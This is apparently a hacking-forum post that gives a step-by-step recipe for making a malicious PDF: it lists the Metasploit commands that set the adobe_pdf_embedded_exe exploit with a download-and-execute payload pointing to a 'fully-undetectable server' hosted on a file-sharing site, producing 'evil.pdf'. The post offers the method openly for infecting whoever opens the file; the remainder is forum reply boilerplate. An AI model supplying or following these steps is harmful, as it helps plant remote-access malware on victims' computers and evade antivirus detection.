Jump to content

Recommended Posts

Posted

 

Didn't see this shit anywhere on here, so I might as well share.

 

Materials:

Any .pdf file of your choosing

Metasploit

Fully-Undetectable Server

 

First, you're going to have to upload your Server to a site with direct linking.

 

Such as, ge.tt or dropbox.

 

Step 1: Open up the metasploit console.

 

Step 2: Type into the console

use exploit/windows/fileformat/adobe_pdf_embedded_exe

 

Step 3: Type into the console

set payload windows/download_exec

 

Step 4: Type into the console

set INFILENAME <path to your pdf>

 

Step 5: Type into the console

set url <direct link to server>

 

Step 6: Type into the console

Exploit

 

The backdoored .pdf will be saved to the same directory as the original .pdf with the filename of 'evil.pdf'.

 

  • 2 weeks later...

Join the conversation

You can post now and register later. If you have an account, sign in now to post with your account.
Note: Your post will require moderator approval before it will be visible.

Guest
Reply to this topic...

×   Pasted as rich text.   Paste as plain text instead

  Only 75 emoji are allowed.

×   Your link has been automatically embedded.   Display as a link instead

×   Your previous content has been restored.   Clear editor

×   You cannot paste images directly. Upload or insert images from URL.



×
×
  • Create New...